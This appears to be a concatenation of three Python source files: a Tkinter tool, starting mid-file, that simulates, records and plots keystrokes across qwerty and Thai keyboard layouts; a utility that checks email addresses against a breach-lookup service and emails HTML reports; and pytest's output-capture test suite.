else:
fig, recording = quick_plot(recording, numeric='percent')
fig.set_size_inches(12, 9)
graph_frame = PopMatplotlibCanvas(fig)
class MenuBar(Menu):
def __init__(self, master, status, analysis_frame, record_session):
Menu.__init__(self, master)
file_menu = Menu(self, tearoff=0)
file_menu.add_command(label='Open text', command=self.open_text)
file_menu.add_separator()
file_menu.add_command(label='Export Recording', command=self.export_recording)
file_menu.add_separator()
file_menu.add_command(label='Quit', command=master.quit)
tools_menu = Menu(self, tearoff=0)
tools_menu.add_command(label='Visualize record', command=self.visualize_record)
tools_menu.add_separator()
tools_menu.add_command(label='Records key stroke', command=self.record_key_stroke)
# tools_menu.add_command(label='Clear record', command=self.clear_record)
self.add_cascade(label='File', menu=file_menu)
self.add_cascade(label='Tools', menu=tools_menu)
self.status = status
self.text_input = analysis_frame.text_input
self.analysis_frame = analysis_frame
self.record_session = record_session
def open_text(self):
answer = askyesno('Warning', 'The currently input text will be deleted, do you want to continue?')
if answer:
self.status.set('Choose text file')
path_to_file = askopenfilename()
if path_to_file:
with open(path_to_file, 'r', encoding='utf-8') as f:
text = f.read()
self.text_input.delete('1.0', END)
self.text_input.insert('1.0', text)
else:
self.status.set('File is not selected')
def export_recording(self):
if self.analysis_frame.recording is not None:
self.status.set("loading simulated record")
recording = self.analysis_frame.recording
else:
self.status.set("simulating recording")
text = self.analysis_frame.text_input_read()
if text != 0:
recording = simulate_recording(text, layout=self.analysis_frame.option_var.get())
else:
return 0
if recording is not None:
self.status.set("saving...")
save_filename = asksaveasfilename(defaultextension=".pyd",
filetypes=(("python dict", "*.pyd"), ("json", "*.json")))
if save_filename == "":
self.status.set("save file name is not specified")
else:
save_recording(recording, save_filename)
self.status.set("Done")
self.status.set("Ready")
return 0
def visualize_record(self):
self.status.set('Choose record file')
path_to_file = askopenfilename()
records = load_recording(path_to_file)
_quick_plot(records, self.status)
def record_key_stroke(self):
panel = RecordPanel(self.record_session, self.status)
panel.record()
def clear_record(self):
self.record_session._recording = {}
class RecordPanel(Toplevel):
def __init__(self, record_session, status):
Toplevel.__init__(self)
self.record_button = Button(self, text='record', command=self.toggle_record)
self.record_button.configure(bg='#fdedec', fg='#000000', width=10, height=4)
self.record_button.pack(pady=2.5)
self.state = BooleanVar(value=False)
action_frame = Frame(self)
Button(action_frame, text='Save', command=self.save).pack(side=LEFT, fill=X, expand=True)
Button(action_frame, text='Clear', command=self.clear).pack(side=LEFT, fill=X)
action_frame.pack(fill=X, padx=2.5, pady=2.5)
Button(self, text='visualize', command=self.visualize).pack(fill=X, padx=2.5, pady=2.5)
self.status = status
self.record_session = record_session
self.thread = threading.Thread(target=self._record_coro)
def toggle_record(self):
if self.state.get(): # switch to idle state
self.state.set(False)
self.record_button.configure(text='record', bg='#fdedec', fg='#000000')
self.record_button.update()
else:
self.state.set(True) # switch to record state
self.record_button.configure(text='stop', bg='#c0392b', fg='#FFFFFF')
self.record_button.update()
def save(self):
# print(self.record_session.records)
filename = asksaveasfilename()
if filename != '':
self.record_session.save_recording(filename)
def clear(self):
answer = askyesno("Warning", "You are about to remove all of records, do you want to continue?")
if answer:
self.record_session._recording = {}
def visualize(self):
_quick_plot(self.record_session.recording, self.status)
@thread_function
def _record_coro(self):
return self.record_session.record()
def record(self):
if self.state.get():
# if there is no result and thread is alive then pass
# if these is result its mean thread is dead start new thread
x = thread_return.result()
# print(x)
if not ((x != 0) and self.thread.is_alive()):
# print(f"alive: {self.thread.is_alive()}")
try:
self.thread.start()
except RuntimeError:
self.thread = threading.Thread(target=self._record_coro)
self.thread.start()
self.after(2, self.record) # support up to 500 words/minute
class StatusBar(Frame):
def __init__(self, master, status_stringvar):
Frame.__init__(self, master)
self.status_text = status_stringvar
self.status_text.set("Ready")
self.status = Label(textvariable=self.status_text, relief=RIDGE)
self.status.config(anchor=E)
self.status.pack(fill=X, padx=5, pady=2.5)
def set(self, status_text):
self.status_text.set(status_text)
self.status.update()
class MatplotlibCanvas(Frame):
def __init__(self, master, fig):
Frame.__init__(self, master)
canvas = FigureCanvasTkAgg(fig, master=self) # A tk.DrawingArea.
canvas.draw()
# pack_toolbar=False will make it easier to use a layout manager later on.
toolbar = NavigationToolbar2Tk(canvas, self, pack_toolbar=False)
toolbar.update()
canvas.mpl_connect(
"key_press_event", lambda event: print(f"you pressed {event.key}"))
canvas.mpl_connect("key_press_event", key_press_handler)
# button = Button(master=self, text="Quit", command=self.quit)
# Packing order is important. Widgets are processed sequentially and if there
# is no space left, because the window is too small, they are not displayed.
# The canvas is rather flexible in its size, so we pack it last which makes
# sure the UI controls are displayed as long as possible.
# button.pack(side=BOTTOM)
toolbar.pack(side=BOTTOM, fill=X)
canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=1)
class PopMatplotlibCanvas(Toplevel):
def __init__(self, fig):
Toplevel.__init__(self)
canvas = MatplotlibCanvas(self, fig)
canvas.pack()
self.title('Visualization')
class AnalyseFrame(Frame):
def __init__(self, master, status):
Frame.__init__(self, master)
Label(self, text='Input Text').pack()
self.status = status
self.text_input = Text(self)
self.text_input.pack(padx=5, pady=2.5, fill=BOTH)
panel = Frame(self)
layout_nest = Frame(panel)
layout_option = ['qwerty', 'pattachoat', 'kedmanee']
Label(layout_nest, text='Layout: ').pack(side=LEFT)
self.option_var = StringVar()
self.option_var.set(layout_option[0])
self.layout_select = OptionMenu(layout_nest, self.option_var, *layout_option)
self.layout_select.pack(side=LEFT)
layout_nest.pack(fill=X, side=LEFT)
analyse_button = Button(panel, text='Visualize', command=self.analyze, bg='#abebc6')
analyse_button.pack(side=LEFT, fill=X, expand=TRUE, padx=2.5)
clear_button = Button(panel, text='Clear', command=self.clear_text, bg='#f1948a')
clear_button.pack(side=LEFT)
panel.pack(padx=5, pady=2.5, fill=X)
self.recording = None
def text_input_read(self):
text = self.text_input.get('1.0', END)
# if the input text is blank text return '\n, if input text is blank terminate function'
if text == '\n':
message = 'Please input some characters'
print(message)
self.status.set(message)
return 0
return text
def analyze(self):
text = self.text_input_read()
if text == 0:
return 0
self.status.set('Analyzing')
# fig = quick_plot(text, layout=self.option_var.get(), numeric='percent')
try:
fig, self.recording = quick_plot(text, layout=self.option_var.get(), numeric='percent')
fig.set_size_inches(12, 9)
graph_frame = PopMatplotlibCanvas(fig)
except Exception as e:
print(e)
self.status.set(e)
else:
self.status.set('Done')
self.status.set('Ready')
def clear_text(self):
answer = askyesno('Warning', 'You are about to remove all text, do you want to continue?')
if answer:
self.text_input.delete('1.0', END)
def _on_key_release(event):
ctrl = (event.state & 0x4) != 0
if event.keycode == 88 and ctrl and event.keysym.lower() != "x":
event.widget.event_generate("<<Cut>>")
if event.keycode == 86 and ctrl and event.keysym.lower() != "v":
event.widget.event_generate("<<Paste>>")
if event.keycode == 67 and ctrl and event.keysym.lower() != "c":
event.widget.event_generate("<<Copy>>")
|
utils.py
|
import requests
import sys
import time
import threading
import smtplib
import datetime
import json
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
now = datetime.datetime.now()
class Spinner:
busy = False
delay = 0.1
@staticmethod
def spinning_cursor():
while 1:
for cursor in '|/-\\': yield cursor
def __init__(self, delay=None):
self.spinner_generator = self.spinning_cursor()
if delay and float(delay): self.delay = delay
def spinner_task(self):
while self.busy:
sys.stdout.write(next(self.spinner_generator))
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write('\b')
sys.stdout.flush()
def start(self):
self.busy = True
threading.Thread(target=self.spinner_task).start()
def stop(self):
self.busy = False
time.sleep(self.delay)
def build_all_list_body(nopwn_list, pwn_list):
new_nopwn_list = []
new_pwn_dict = {}
new_pwn_list = []
for i in nopwn_list:
new_nopwn_list.append('<br />{}<br />'.format(i))
for k in pwn_list:
str1 = ''
for site in pwn_list[k]:
str1 += ' {}, '.format(site)
new_pwn_dict[k] = str1
for k in new_pwn_dict:
new_pwn_list.append('<p><br />{key} :{list}</p>'.format(key=k, list=new_pwn_dict[k]))
html = """\
<html>
<head></head>
<body>
<p>Hi (your name),</p>
<h4>These Emails have not been pwned:</h4>{new_nopwn_list}
<h4>Oh no! These emails have been pwned:</h4>
{new_pwn_list}
<h4><br />Yours Truly,<br /> (your name) ;)</h4>
</body>
</html>
""".format(new_nopwn_list=''.join(new_nopwn_list), new_pwn_list='\n'.join(new_pwn_list))
return html
"""Returns a list of sites where email was pwned"""
def check(email, url):
full_url = url + email
final_data = []
r = requests.get(full_url)
if r:
data = r.text.strip('[').strip(']')
data = data.split(',')
for site in data:
final_data.append(site.strip('"'))
return final_data
def build_nopwn_body(email):
html = """\
<html>
<head></head>
<body>
<h4>Hi,</h4>
<h4>Congrats! Your email: <strong><span style="color: #ff0000;">"{email}"</span></strong> has not been pwned.</h4>
<h4>To verify you can go to: https://haveibeenpwned.com/</h4>
<h4><br />Yours Truly,<br />(your name) ;)</h4>
</body>
</html>
""".format(email=email)
return html
def build_pwn_body(email, sites):
str1 = """\
<html>
<head></head>
<body>
<p>Hi,
<br />
<br />Sorry! Your email: <span style="color: #ff0000;"><em><strong>"{email}"</strong></em></span> has been pwned. These sites have been compromised containing your email:
""".format(email=email)
str2 = """\
<br />
<br />You should change your password on each of these sites ASAP.
<br />
<br />To verify you can go to: https://haveibeenpwned.com/
<br />
<br />
<br />Yours Truly,
<br />(your name)</p>
</body>
</html>
""".format(email=email)
for site in sites:
string = '<br /><strong>- {site}</strong>'.format(site=site)
str1 += string
html = str1 + str2
return html
# This function sends a confirmation email and text
def send_email(currentEmail, body):
#Fill in service account information / credentials
gmail_user = ""
gmail_pwd = ""
FROM = ""
TOEMAIL = currentEmail if type(currentEmail) is list else [currentEmail]
SUBJECT = 'checkpwned {}'.format(now.date())
HTML = body
# Create message container - the correct MIME type is multipart/alternative.
msg = MIMEMultipart('alternative')
msg['Subject'] = SUBJECT
msg['From'] = FROM
msg['To'] = ",".join(TOEMAIL)
# # Record the MIME types of both parts - text/plain and text/html.
part2 = MIMEText(HTML, 'html')
#
# # Attach parts into message container.
# # According to RFC 2046, the last part of a multipart message, in this case
# # the HTML message, is best and preferred.
msg.attach(part2)
try:
server_ssl = smtplib.SMTP_SSL("smtp.gmail.com", 465)
server_ssl.ehlo() # optional, called by login()
server_ssl.login(gmail_user, gmail_pwd)
server_ssl.sendmail(msg['From'], msg['To'], msg.as_string())
server_ssl.close()
return 'Succesfully sent the Email confirmation to: {}'.format(currentEmail)
except ValueError as e:
return "Failed to send mail because of:\n{}".format(e)
|
test_capture.py
|
import contextlib
import io
import os
import subprocess
import sys
import textwrap
from io import UnsupportedOperation
from typing import BinaryIO
from typing import cast
from typing import Generator
from typing import TextIO
import pytest
from _pytest import capture
from _pytest.capture import _get_multicapture
from _pytest.capture import CaptureManager
from _pytest.capture import CaptureResult
from _pytest.capture import MultiCapture
from _pytest.config import ExitCode
from _pytest.pytester import Testdir
# note: py.io capture tests where copied from
# pylib 1.4.20.dev2 (rev 13d9af95547e)
def StdCaptureFD(
out: bool = True, err: bool = True, in_: bool = True
) -> MultiCapture[str]:
return capture.MultiCapture(
in_=capture.FDCapture(0) if in_ else None,
out=capture.FDCapture(1) if out else None,
err=capture.FDCapture(2) if err else None,
)
def StdCapture(
out: bool = True, err: bool = True, in_: bool = True
) -> MultiCapture[str]:
return capture.MultiCapture(
in_=capture.SysCapture(0) if in_ else None,
out=capture.SysCapture(1) if out else None,
err=capture.SysCapture(2) if err else None,
)
def TeeStdCapture(
out: bool = True, err: bool = True, in_: bool = True
) -> MultiCapture[str]:
return capture.MultiCapture(
in_=capture.SysCapture(0, tee=True) if in_ else None,
out=capture.SysCapture(1, tee=True) if out else None,
err=capture.SysCapture(2, tee=True) if err else None,
)
class TestCaptureManager:
@pytest.mark.parametrize("method", ["no", "sys", "fd"])
def test_capturing_basic_api(self, method):
capouter = StdCaptureFD()
old = sys.stdout, sys.stderr, sys.stdin
try:
capman = CaptureManager(method)
capman.start_global_capturing()
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method == "no":
assert old == (sys.stdout, sys.stderr, sys.stdin)
else:
assert not out
capman.resume_global_capture()
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method != "no":
assert out == "hello\n"
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
def test_init_capturing(self):
capouter = StdCaptureFD()
try:
capman = CaptureManager("fd")
capman.start_global_capturing()
pytest.raises(AssertionError, capman.start_global_capturing)
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_unicode(testdir, method):
obj = "'b\u00f6y'"
testdir.makepyfile(
"""\
# taken from issue 227 from nosetests
def test_unicode():
import sys
print(sys.stdout)
print(%s)
"""
% obj
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_bytes_in_utf8_encoding(testdir, method):
testdir.makepyfile(
"""\
def test_unicode():
print('b\\u00f6y')
"""
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
def test_collect_capturing(testdir):
p = testdir.makepyfile(
"""
import sys
print("collect %s failure" % 13)
sys.stderr.write("collect %s_stderr failure" % 13)
import xyz42123
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*Captured stdout*",
"collect 13 failure",
"*Captured stderr*",
"collect 13_stderr failure",
]
)
class TestPerTestCapturing:
def test_capture_and_fixtures(self, testdir):
p = testdir.makepyfile(
"""
def setup_module(mod):
print("setup module")
def setup_function(function):
print("setup " + function.__name__)
def test_func1():
print("in func1")
assert 0
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"setup module*",
"setup test_func1*",
"in func1*",
"setup test_func2*",
"in func2*",
]
)
@pytest.mark.xfail(reason="unimplemented feature")
def test_capture_scope_cache(self, testdir):
p = testdir.makepyfile(
"""
import sys
def setup_module(func):
print("module-setup")
def setup_function(func):
print("function-setup")
def test_func():
print("in function")
assert 0
def teardown_function(func):
print("in teardown")
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*test_func():*",
"*Captured stdout during setup*",
"module-setup*",
"function-setup*",
"*Captured stdout*",
"in teardown*",
]
)
def test_no_carry_over(self, testdir):
p = testdir.makepyfile(
"""
def test_func1():
print("in func1")
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
s = result.stdout.str()
assert "in func1" not in s
assert "in func2" in s
def test_teardown_capturing(self, testdir):
p = testdir.makepyfile(
"""
def setup_function(function):
print("setup func1")
def teardown_function(function):
print("teardown func1")
assert 0
def test_func1():
print("in func1")
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*teardown_function*",
"*Captured stdout*",
"setup func1*",
"in func1*",
"teardown func1*",
# "*1 fixture failure*"
]
)
def test_teardown_capturing_final(self, testdir):
p = testdir.makepyfile(
"""
def teardown_module(mod):
print("teardown module")
assert 0
def test_func():
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*def teardown_module(mod):*",
"*Captured stdout*",
"*teardown module*",
"*1 error*",
]
)
def test_capturing_outerr(self, testdir):
p1 = testdir.makepyfile(
"""\
import sys
def test_capturing():
print(42)
sys.stderr.write(str(23))
def test_capturing_error():
print(1)
sys.stderr.write(str(2))
raise ValueError
"""
)
result = testdir.runpytest(p1)
result.stdout.fnmatch_lines(
[
"*test_capturing_outerr.py .F*",
"====* FAILURES *====",
"____*____",
"*test_capturing_outerr.py:8: ValueError",
"*--- Captured stdout *call*",
"1",
"*--- Captured stderr *call*",
"2",
]
)
class TestLoggingInteraction:
def test_logging_stream_ownership(self, testdir):
p = testdir.makepyfile(
"""\
def test_logging():
import logging
import pytest
stream = capture.CaptureIO()
logging.basicConfig(stream=stream)
stream.close() # to free memory/release resources
"""
)
result = testdir.runpytest_subprocess(p)
assert result.stderr.str().find("atexit") == -1
def test_logging_and_immediate_setupteardown(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_function(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_function(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors show first!
)
# verify proper termination
assert "closed" not in s
def test_logging_and_crossscope_fixtures(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_module(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_module(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors come first
)
# verify proper termination
assert "closed" not in s
def test_conftestlogging_is_shown(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
logging.warning("hello435")
"""
)
# make sure that logging is still captured in tests
result = testdir.runpytest_subprocess("-s", "-p", "no:capturelog")
assert result.ret == ExitCode.NO_TESTS_COLLECTED
result.stderr.fnmatch_lines(["WARNING*hello435*"])
assert "operation on closed file" not in result.stderr.str()
def test_conftestlogging_and_test_logging(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello():
import logging
logging.warning("hello433")
assert 0
"""
)
result = testdir.runpytest_subprocess(p, "-p", "no:capturelog")
assert result.ret != 0
result.stdout.fnmatch_lines(["WARNING*hello433*"])
assert "something" not in result.stderr.str()
assert "operation on closed file" not in result.stderr.str()
def test_logging_after_cap_stopped(self, testdir):
testdir.makeconftest(
"""\
import pytest
import logging
log = logging.getLogger(__name__)
@pytest.fixture
def log_on_teardown():
yield
log.warning('Logging on teardown')
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello(log_on_teardown):
import logging
logging.warning("hello433")
assert 1
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p, "--log-cli-level", "info")
assert result.ret != 0
result.stdout.fnmatch_lines(
["*WARNING*hello433*", "*WARNING*Logging on teardown*"]
)
assert (
"AttributeError: 'NoneType' object has no attribute 'resume_capturing'"
not in result.stderr.str()
)
class TestCaptureFixture:
@pytest.mark.parametrize("opt", [[], ["-s"]])
def test_std_functional(self, testdir, opt):
reprec = testdir.inline_runsource(
"""\
def test_hello(capsys):
print(42)
out, err = capsys.readouterr()
assert out.startswith("42")
""",
*opt,
)
reprec.assertoutcome(passed=1)
def test_capsyscapfd(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfd):
pass
def test_two(capfd, capsys):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*ERROR*setup*test_one*",
"E*capfd*capsys*same*time*",
"*ERROR*setup*test_two*",
"E*capsys*capfd*same*time*",
"*2 errors*",
]
)
def test_capturing_getfixturevalue(self, testdir):
"""Test that asking for "capfd" and "capsys" using request.getfixturevalue
in the same test is an error.
"""
testdir.makepyfile(
"""\
def test_one(capsys, request):
request.getfixturevalue("capfd")
def test_two(capfd, request):
request.getfixturevalue("capsys")
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(
[
"*test_one*",
"E * cannot use capfd and capsys at the same time",
"*test_two*",
"E * cannot use capsys and capfd at the same time",
"*2 failed in*",
]
)
def test_capsyscapfdbinary(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfdbinary):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
["*ERROR*setup*test_one*", "E*capfdbinary*capsys*same*time*", "*1 error*"]
)
@pytest.mark.parametrize("method", ["sys", "fd"])
def test_capture_is_represented_on_failure_issue128(self, testdir, method):
p = testdir.makepyfile(
"""\
def test_hello(cap{}):
print("xxx42xxx")
assert 0
""".format(
method
)
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["xxx42xxx"])
def test_stdfd_functional(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfd):
import os
os.write(1, b"42")
out, err = capfd.readouterr()
assert out.startswith("42")
capfd.close()
"""
)
reprec.assertoutcome(passed=1)
@pytest.mark.parametrize("nl", ("\n", "\r\n", "\r"))
def test_cafd_preserves_newlines(self, capfd, nl):
print("test", end=nl)
out, err = capfd.readouterr()
assert out.endswith(nl)
def test_capfdbinary(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfdbinary):
import os
# some likely un-decodable bytes
os.write(1, b'\\xfe\\x98\\x20')
out, err = capfdbinary.readouterr()
assert out == b'\\xfe\\x98\\x20'
assert err == b''
"""
)
reprec.assertoutcome(passed=1)
def test_capsysbinary(self, testdir):
p1 = testdir.makepyfile(
r"""
def test_hello(capsysbinary):
import sys
sys.stdout.buffer.write(b'hello')
# Some likely un-decodable bytes.
sys.stdout.buffer.write(b'\xfe\x98\x20')
sys.stdout.buffer.flush()
# Ensure writing in text mode still works and is captured.
# https://github.com/pytest-dev/pytest/issues/6871
print("world", flush=True)
out, err = capsysbinary.readouterr()
assert out == b'hello\xfe\x98\x20world\n'
assert err == b''
print("stdout after")
print("stderr after", file=sys.stderr)
"""
)
result = testdir.runpytest(str(p1), "-rA")
result.stdout.fnmatch_lines(
[
"*- Captured stdout call -*",
"stdout after",
"*- Captured stderr call -*",
"stderr after",
"*= 1 passed in *",
]
)
def test_partial_setup_failure(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capsys, missingarg):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["*test_partial_setup_failure*", "*1 error*"])
def test_keyboardinterrupt_disables_capturing(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capfd):
import os
os.write(1, b'42')
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p)
result.stdout.fnmatch_lines(["*KeyboardInterrupt*"])
assert result.ret == 2
def test_capture_and_logging(self, testdir):
"""#14"""
p = testdir.makepyfile(
"""\
import logging
def test_log(capsys):
logging.error('x')
"""
)
result = testdir.runpytest_subprocess(p)
assert "closed" not in result.stderr.str()
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
@pytest.mark.parametrize("no_capture", [True, False])
def test_disabled_capture_fixture(self, testdir, fixture, no_capture):
testdir.makepyfile(
"""\
def test_disabled({fixture}):
print('captured before')
with {fixture}.disabled():
print('while capture is disabled')
print('captured after')
assert {fixture}.readouterr() == ('captured before\\ncaptured after\\n', '')
def test_normal():
print('test_normal executed')
""".format(
fixture=fixture
)
)
args = ("-s",) if no_capture else ()
result = testdir.runpytest_subprocess(*args)
result.stdout.fnmatch_lines(["*while capture is disabled*", "*= 2 passed in *"])
result.stdout.no_fnmatch_line("*captured before*")
result.stdout.no_fnmatch_line("*captured after*")
if no_capture:
assert "test_normal executed" in result.stdout.str()
else:
result.stdout.no_fnmatch_line("*test_normal executed*")
def test_disabled_capture_fixture_twice(self, testdir: Testdir) -> None:
"""Test that an inner disabled() exit doesn't undo an outer disabled().
Issue #7148.
"""
testdir.makepyfile(
"""
def test_disabled(capfd):
print('captured before')
with capfd.disabled():
print('while capture is disabled 1')
with capfd.disabled():
print('while capture is disabled 2')
print('while capture is disabled 1 after')
print('captured after')
assert capfd.readouterr() == ('captured before\\ncaptured after\\n', '')
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
[
"*while capture is disabled 1",
"*while capture is disabled 2",
"*while capture is disabled 1 after",
],
consecutive=True,
)
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures(self, testdir, fixture):
"""Ensure that capsys and capfd can be used by other fixtures during
setup and teardown."""
testdir.makepyfile(
"""\
import sys
import pytest
@pytest.fixture
def captured_print({fixture}):
print('stdout contents begin')
print('stderr contents begin', file=sys.stderr)
out, err = {fixture}.readouterr()
yield out, err
print('stdout contents end')
print('stderr contents end', file=sys.stderr)
out, err = {fixture}.readouterr()
assert out == 'stdout contents end\\n'
assert err == 'stderr contents end\\n'
def test_captured_print(captured_print):
out, err = captured_print
assert out == 'stdout contents begin\\n'
assert err == 'stderr contents begin\\n'
""".format(
fixture=fixture
)
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(["*1 passed*"])
result.stdout.no_fnmatch_line("*stdout contents begin*")
result.stdout.no_fnmatch_line("*stderr contents begin*")
@pytest.mark.parametrize("cap", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures_teardown(self, testdir, cap):
"""Ensure we can access setup and teardown buffers from teardown when using capsys/capfd (##3033)"""
testdir.makepyfile(
"""\
import sys
import pytest
import os
@pytest.fixture()
def fix({cap}):
print("setup out")
sys.stderr.write("setup err\\n")
yield
out, err = {cap}.readouterr()
assert out == 'setup out\\ncall out\\n'
assert err == 'setup err\\ncall err\\n'
def test_a(fix):
print("call out")
sys.stderr.write("call err\\n")
""".format(
cap=cap
)
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_setup_failure_does_not_kill_capturing(testdir):
sub1 = testdir.mkpydir("sub1")
sub1.join("conftest.py").write(
textwrap.dedent(
"""\
def pytest_runtest_setup(item):
raise ValueError(42)
"""
)
)
sub1.join("test_mod.py").write("def test_func1(): pass")
result = testdir.runpytest(testdir.tmpdir, "--traceconfig")
result.stdout.fnmatch_lines(["*ValueError(42)*", "*1 error*"])
def test_capture_conftest_runtest_setup(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest()
assert result.ret == 0
result.stdout.no_fnmatch_line("*hello19*")
def test_capture_badoutput_issue412(testdir):
testdir.makepyfile(
"""
import os
def test_func():
omg = bytearray([1,129,1])
os.write(1, omg)
assert 0
"""
)
result = testdir.runpytest("--capture=fd")
result.stdout.fnmatch_lines(
"""
*def test_func*
*assert 0*
*Captured*
*1 failed*
"""
)
def test_capture_early_option_parsing(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest("-vs")
assert result.ret == 0
assert "hello19" in result.stdout.str()
def test_capture_binary_output(testdir):
testdir.makepyfile(
r"""
import pytest
def test_a():
import sys
import subprocess
subprocess.call([sys.executable, __file__])
def test_foo():
import os;os.write(1, b'\xc3')
if __name__ == '__main__':
test_foo()
"""
)
result = testdir.runpytest("--assert=plain")
result.assert_outcomes(passed=2)
def test_error_during_readouterr(testdir):
"""Make sure we suspend capturing if errors occur during readouterr"""
testdir.makepyfile(
pytest_xyz="""
from _pytest.capture import FDCapture
def bad_snap(self):
raise Exception('boom')
assert FDCapture.snap
FDCapture.snap = bad_snap
"""
)
result = testdir.runpytest_subprocess("-p", "pytest_xyz", "--version")
result.stderr.fnmatch_lines(
["*in bad_snap", " raise Exception('boom')", "Exception: boom"]
)
class TestCaptureIO:
def test_text(self):
f = capture.CaptureIO()
f.write("hello")
s = f.getvalue()
assert s == "hello"
f.close()
def test_unicode_and_str_mixture(self):
f = capture.CaptureIO()
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_write_bytes_to_buffer(self):
"""In python3, stdout / stderr are text io wrappers (exposing a buffer
property of the underlying bytestream). See issue #1407
"""
f = capture.CaptureIO()
f.buffer.write(b"foo\r\n")
assert f.getvalue() == "foo\r\n"
class TestTeeCaptureIO(TestCaptureIO):
def test_text(self):
sio = io.StringIO()
f = capture.TeeCaptureIO(sio)
f.write("hello")
s1 = f.getvalue()
assert s1 == "hello"
s2 = sio.getvalue()
assert s2 == s1
f.close()
sio.close()
def test_unicode_and_str_mixture(self):
sio = io.StringIO()
f = capture.TeeCaptureIO(sio)
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_dontreadfrominput():
from _pytest.capture import DontReadFromInput
f = DontReadFromInput()
assert f.buffer is f
assert not f.isatty()
pytest.raises(OSError, f.read)
pytest.raises(OSError, f.readlines)
iter_f = iter(f)
pytest.raises(OSError, next, iter_f)
pytest.raises(UnsupportedOperation, f.fileno)
f.close() # just for completeness
def test_captureresult() -> None:
cr = CaptureResult("out", "err")
assert len(cr) == 2
assert cr.out == "out"
assert cr.err == "err"
out, err = cr
assert out == "out"
assert err == "err"
assert cr[0] == "out"
assert cr[1] == "err"
assert cr == cr
assert cr == CaptureResult("out", "err")
assert cr != CaptureResult("wrong", "err")
assert cr == ("out", "err")
assert cr != ("out", "wrong")
assert hash(cr) == hash(CaptureResult("out", "err"))
assert hash(cr) == hash(("out", "err"))
assert hash(cr) != hash(("out", "wrong"))
assert cr < ("z",)
assert cr < ("z", "b")
assert cr < ("z", "b", "c")
assert cr.count("err") == 1
assert cr.count("wrong") == 0
assert cr.index("err") == 1
with pytest.raises(ValueError):
assert cr.index("wrong") == 0
assert next(iter(cr)) == "out"
assert cr._replace(err="replaced") == ("out", "replaced")
@pytest.fixture
def tmpfile(testdir) -> Generator[BinaryIO, None, None]:
f = testdir.makepyfile("").open("wb+")
yield f
if not f.closed:
f.close()
@contextlib.contextmanager
def lsof_check():
pid = os.getpid()
try:
out = subprocess.check_output(("lsof", "-p", str(pid))).decode()
except (OSError, subprocess.CalledProcessError, UnicodeDecodeError) as exc:
# about UnicodeDecodeError, see note on pytester
pytest.skip(f"could not run 'lsof' ({exc!r})")
yield
